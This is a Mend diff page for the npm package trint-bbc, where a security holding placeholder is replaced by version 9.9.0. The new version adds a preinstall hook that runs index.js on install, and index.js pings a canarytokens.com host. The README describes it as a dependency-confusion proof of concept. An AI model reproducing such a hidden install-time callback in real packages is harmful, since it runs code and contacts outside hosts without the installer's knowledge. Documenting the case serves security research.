npm - trint-bbc - Versions diffs - 0.0.1-security → 9.9.0 - Mend

trint-bbc 0.0.1-security → 9.9.0

This version of trint-bbc might be problematic. Click here for more details.

Files changed (3) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,3 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=trint-bbc for more information.
+<h1 align="center">This NPM package vulnerable to dependency confiuse vulnerability</h1>
+<p align="center">Name: Anindya Ghoshal</p>
+<p align="center">Contact: hackwithghoshal@gamil.com</p>

package/index.js ADDED Viewed

@@ -0,0 +1,29 @@
+// This code just notify me it's trigger
+// Importing https module
+const http = require('http');
+// Setting the configuration for
+// the request
+const options = {
+	hostname: '5hjrkbihgawg4xogmn7bt5gi5.canarytokens.com',
+	path: '/posts',
+	method: 'GET'
+};
+// Sending the request
+const req = http.request(options, (res) => {
+	let data = ''
+	res.on('data', (chunk) => {
+		data += chunk;
+	});
+	// Ending the response
+	res.on('end', () => {
+		// console.log('Body:', JSON.parse(data))
+	});
+}).on("error", (err) => {
+	// console.log("Error: ", err)
+}).end()

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
   "name": "trint-bbc",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.9.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall" : "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
 }